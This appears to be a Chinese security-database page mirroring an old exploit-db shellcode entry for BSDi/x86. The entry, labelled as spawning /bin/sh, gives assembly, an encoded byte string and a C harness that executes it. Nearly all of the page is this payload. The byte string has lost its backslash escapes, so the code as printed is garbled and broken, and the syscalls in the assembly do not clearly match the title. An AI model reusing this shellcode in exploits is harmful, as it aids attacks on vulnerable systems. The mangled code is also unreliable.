BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

漏洞ID 1054677 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)-安全小百科CVE编号 N/A
图片[2]-BSDi/x86 – execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSDi_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13260
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
	BSDi shellcode

	jmp    0x57
	pop    %esi
	xor    %ebx,%ebx
	add    $0x8,%ebx
	add    $0x2,%ebx
	mov    %bl,0x26(%esi)
	xor    %ebx,%ebx
	add    $0x23,%ebx
	add    $0x23,%ebx
	mov    %bl,0xffffffa8(%esi)
	xor    %ebx,%ebx
	add    $0x26,%ebx
	add    $0x30,%ebx
	mov    %bl,0xffffffc2(%esi)
	xor    %eax,%eax
	mov    %al,0xb(%esi)
	mov    %esi,%ebx
	add    $0x5,%eax
	xor    %ecx,%ecx
	add    $0x1,%ecx
	xor    %edx,%edx
	int    $0x80
	mov    %eax,%ebx
	xor    %eax,%eax
	add    $0x4,%eax
	xor    %edx,%edx
	mov    %dl,0x27(%esi)
	mov    %esi,%ecx
	add    $0xc,%ecx
	add    $0x1b,%edx
	int    $0x80
	xor    %eax,%eax
	add    $0x6,%eax
	int    $0x80
	xor    %eax,%eax
	add    $0x1,%eax
	int    $0x80
	.string	"BIN/SH"
*/

char code[] =
  "xebx57x5ex31xdbx83xc3x08x83xc3x02x88x5e"
  "x26x31xdbx83xc3x23x83xc3x23x88x5exa8x31"
  "xdbx83xc3x26x83xc3x30x88x5exc2x31xc0x88"
  "x46x0bx89xf3x83xc0x05x31xc9x83xc1x01x31"
  "xd2xcdx80x89xc3x31xc0x83xc0x04x31xd2x88"
  "x56x27x89xf1x83xc1x0cx83xc2x1bxcdx80x31"
  "xc0x83xc0x06xcdx80x31xc0x83xc0x01xcdx80"
  "BIN/SH";

main()
{
  int (*f)();
  f = (int (*)()) code;
  printf("BSDi old shellcode, %d bytesn", strlen(code));
  (int)(*f)();
}

// milw0rm.com [2004-09-26]

相关推荐: SCO OpenServer accept Buffer Overflow Vulnerability

SCO OpenServer accept Buffer Overflow Vulnerability 漏洞ID 1103326 漏洞类型 Boundary Condition Error 发布时间 2001-04-13 更新时间 2001-04-13 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享